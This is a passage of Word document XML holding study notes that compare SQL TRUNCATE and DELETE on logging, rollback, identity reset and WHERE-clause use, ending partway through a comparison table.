    <w:p w14:paraId="112AD22F" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No WHERE clause allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE0FAB" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resets identity/auto-increment columns (in some RDBMS like SQL Server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263BEE9C" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Faster and less resource-intensive than DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DA831" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not log individual row deletions (minimal logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A519E" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00000000" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="24BC925C">
          <v:rect id="_x0000_i2946" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9F0DF" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A3FA7" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Removes rows one at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8BCB1" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can be rolled back if within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB8FAB" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can use WHERE clause to delete specific rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5363E5" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not reset identity/auto-increment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C31B1" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Slower for large datasets due to row-by-row logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B238D" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00000000" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7147A4B7">
          <v:rect id="_x0000_i2947" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FA04E" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🆚</w:t>
      </w:r>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quick Comparis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0"/>
        <w:gridCol w:w="2181"/>
        <w:gridCol w:w="2784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="1AE1BB50" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7085A022" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="515D2359" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D21F5DB" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="5C4F22CE" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DB9D24" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Removes all rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="642846F1" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Yes (if no WHERE used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783675B9" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="0F3A3C31" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F7288D" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Conditional deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EDBA2C2" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Yes (with WHERE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFFB7C8" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="60595624" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4823D0AF" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rollback possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21099BD9" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Yes (in transaction)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08AC983F" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Limited / No (depends on DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="096C4E13" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E4A9831" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Resets identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBD65F7" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
